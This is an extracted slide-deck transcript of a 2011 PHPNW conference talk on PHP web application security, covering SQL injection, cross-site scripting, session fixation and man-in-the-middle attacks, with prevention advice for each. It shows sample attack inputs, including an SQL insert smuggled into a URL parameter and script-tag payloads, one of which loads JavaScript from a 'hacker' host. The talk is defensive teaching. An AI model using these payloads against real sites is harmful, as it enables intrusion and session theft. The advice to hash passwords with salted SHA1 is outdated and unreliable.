Phpnw security-20111009
-
Upload
paul-lemon -
Category
Technology
-
view
1.183 -
download
0
description
Transcript of Phpnw security-20111009
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Are you feeling secure – notes from the trenches
Paul Lemon @anthonylime
http://joind.in/3603
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Introduction
- I am a web developer and have been for 13 years- Former sound engineer to the obscure and poor- Technical Director at MadeByPi- I love what I do - PHP / Java / Actionscript / Javascript / C#- Wear a mean hairnet
About me
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
“The problem of insecure software is perhaps the most important technical challenge of our time.” – OWASP Testing Guide Introduction.
Photo courtesy http://www.flickr.com/photos/katescars/
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Introduction
- Notes based on personal professional experience- Over 20+ third party tests on our applications- Development orientated- Simple code examples – not production code.
This presentation
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Introduction
Open Web Application Security Project
Best resource for developers / analysts / testers
https://www.owasp.org/
OWASP
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Introduction
SQL Injection
Cross-Site Scripting (XSS)
Broken Authentication and Session Management
Insecure Direct Object References
Cross-Site Request Forgery (CSRF)
Security Misconfiguration
Insecure Cryptographic Storage
Failure to Restrict URL Access
Insufficient Transport Layer Protection
Unvalidated Redirects and Forwards
OWASP Top 10
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Introduction
SQL Injection
Cross-Site Scripting (XSS)
Broken Authentication and Session Management
Insecure Direct Object References
Cross-Site Request Forgery (CSRF)
Security Misconfiguration
Insecure Cryptographic Storage
Failure to Restrict URL Access
Insufficient Transport Layer Protection
Unvalidated Redirects and Forwards
OWASP Top 10
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
SQL Injection
http://www.flickr.com/photos/andresrueda/2983149263/
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Injection
http://xkcd.com/327/
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Injection
http://someserver/script.php?id=1;INSERT INTO members ('email','passwd','login_id','full_name')VALUES ('[email protected]','hello',‘paul',’Paul Lemon');
Sample Code
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Injection
- Confidential data can be disclosed
- -
The results of the query may not visible in the HTML
- Trial and error to iterate data in tables
- Execute long running queries
- Test for errors in page execution
- Vulnerable to inserts / updates / defacement
How is it exploited
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Injection
Validation and Parameterised Query
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Injection
- Validate all input. - Use PDO to create parameterised queries or- Use a ORM or Database Library (not your own!)- Set up your database permissions.- Don’t expose your queries (logging etc)- Code review- Don’t be complacent
How to prevent
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Injection
- Validation is not just for the user’s benefit- Cast to correct type i.e. intval / floatval / boolean- Whitelist Input ranges - Reasonable minimums and maximums- Whitelist with regular expression- Blacklist with regular expression- Validate Email / Urls - Don’t rely on your model layer
A quick note about validation
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS
http://www.flickr.com/photos/andresrueda/2983149263/
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS
http://someserver/script.php?name=<script>alert();</script>orhttp://bit.ly/lYMcHjkj
Sample XSS
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS
http://host/script.php?name=<script src='http://hacker/script.js' />
Sample XSS
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS
Potential Exploits
- Theft of session cookies- Insertion of content / forms etc- Redirection to malicious sites- Insertion of trojan downloads / keyloggers etc.
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS
Varieties of XSS
• Persistent - data is stored in the database• Nonpersistent - injected code is present in the URL/Request• DOM Based - javascript executed in the page reads the request
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS
Web application
Trusted Not Trusted
Browser
• Posted Form• Querystring• Url• Cookies• HTTP Headers
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS – Trust zones
Web application
Trusted Not Trusted
APIAPI
• Use HTTPS•Treat as user input
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS – Trust zones
Web application
Trusted Not Trusted
Database
• Database may have been compromised• Validation may have failed• Escape all output
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS – Trust zones
Web application
Trusted Not Trusted
Browser
APIAPI
Database
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS – Trust zones
Web application
Trusted Not Trusted
Browser
APIAPI
Database
Your application should be modular too
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS
Escape all output
- ENT_QUOTES option is important – double and single quotes- Page encoding is important- If you need HTML output use HTML Purifier
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS
Escape all output – context is important
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS
?name=<script>alert("hello");</script>&link=javascript:alert('hello')
Escape all output – context is important
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS
?name=<script>alert("hello");</script>&link=javascript:alert('hello')
Escape all output – context is important
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS
- Check your templating engine for XSS protection (options in Symfony 1/ Twig for escaping by default)
- Context is important to the escaping used - Image and Hyperlinks- Javascript blocks- CSS
- There is not a definitive solution for PHP- https://www.owasp.org/index.php/ESAPI#tab=PHP
Preventing XSS
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSS
Session cookie to use HTTPOnly in php.ini
- Or use PHP function session_set_cookie_params
Cookies set as HTTPOnly
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
- Session Fixation
- Man in the middle attacks
Overview
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Allowing the session id to be passed on the querystring
Url is sent via email to potential victim
visit this url to the site http://localhost/?sessionid=1234
Victim logs in and this is attached to the session id
Sender uses the original session id and gains access
http://localhost/viewprofile?sessionid=1234
Session Fixation
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Do not allow session id to be passed on the querystring
Session Fixation – How to prevent
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Where the attacker has access to the machine
- First user notes down the session id on the computer
- Second user logs in and this is attached to the session id
- First user uses the original session id and gains access
Session Fixation
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
- Roll the session id when a user logs in
-
You can change the session id more frequently…
Session Fixation – How to prevent
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Man in the middle attacks
Web applicationUsername / Password
User logs in…
Session Id - Cookie
HTTP POST
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Man in the middle attacks
Web applicationUsername / Password
User logs in…
Session Id - Cookie
HTTP POST
Ahoy!
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Man in the middle attacks
Web applicationUsername / Password
User logs in…
Session Id - Cookie
HTTPS POST
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
- Login and authentication must always be over HTTPS- Passwords are personal and confidential- Users are not disciplined- (Store your passwords securely SHA1 / Salt )
Man in the middle attacks
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Man in the middle attacks
Web applicationUsername / Password
User logs in…
Session Id - Cookie
HTTPS POST
Web application
User visits a non-secure page
Resource downloaded
HTTP GET
Session Id - Cookie
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Man in the middle attacks
Web applicationUsername / Password
User logs in…
Session Id - Cookie
HTTPS POST
Web application
User visits a non-secure page
Resource downloaded
HTTP GET
Session Id - Cookie
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
- Authenticated session cookies should be delivered over SSL- Use HTTPS only option on session cookie- Use a separate domain if you can e.g. https://admin.yoursite/- Use a separate path for your session cookie
Man in the middle attacks
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Man in the middle attacks
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Man in the middle attacks
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Man in the middle attacks
Web applicationUsername / Password
User logs in…
Session Id - Cookie
HTTPS POST
Web application
User visits a non-secure page
Resource downloaded
HTTP GET
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Man in the middle attacks
Web applicationUsername / Password
User logs in…
Session Id - Cookie
HTTPS POST
Web application
User visits a non-secure page
Resource downloaded
HTTP GET
Curses!
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Man in the middle attacks
- Sometimes you cannot limit session to HTTPS- Users can log in and see non-secure data in public pages- There are still secure areas of the site- Use two cookies- Or make the user login again
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Web application
Username / PasswordUser logs in…
Session Id – Cookie SECURE
HTTPS POST
Open Zone ofWeb application
User visits a non-secure page
Resource downloaded
HTTP GET
Session Id
Extra Auth – Cookie SECURE
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Session Exploits
Web application
Username / PasswordUser logs in…
Session Id – Cookie SECURE
HTTPS POST
Secure Zone ofWeb application
User visits a non-secure page
Response
HTTPS GET/POST/PUT
Session Id
Extra Auth – Cookie SECURE
Extra Auth – Cookie
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSRF
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
XSRF – Sorry no time
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Conclusions
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Conclusions
Get someone else to do the work
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Conclusions
- Use a framework. I like symfony.- Use a well supported platform / CMS - Check their response to security issues- If there is no solution – check again (and again)
Get someone else to do the work
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Conclusions
- Expect there to be faults – test as much as you can.- Expect there to be attacks – monitor your site- Stay on top of your versions – PHP / MySQL etc- Input validation is critical- Code for quality / Unit tests / regression- Code review- Operate with least privilege- Establish a build and deployment script- Read OWASP
Recommendations
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
• XSS cheatlist: http://ha.ckers.org/xss.html• OWASP:
https://www.owasp.org/index.php/Main_Page • HTML Purifier: http://htmlpurifier.org/• Context aware templates:
http://googleonlinesecurity.blogspot.com/2009/03/reducing-xss-by-way-of-automatic.html
• MadeByPi: http://www.madebypi.co.uk
Conclusions
Resources
Paul Lemon PHPNW 11 – Notes from the trenches
are
you
feelin
g s
ecu
re?
Paul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenchesPaul Lemon PHPNW 11 – Notes from the trenches
Are you feeling secure – notes from the trenches
Paul Lemon @anthonylime – [email protected]
http://joind.in/3603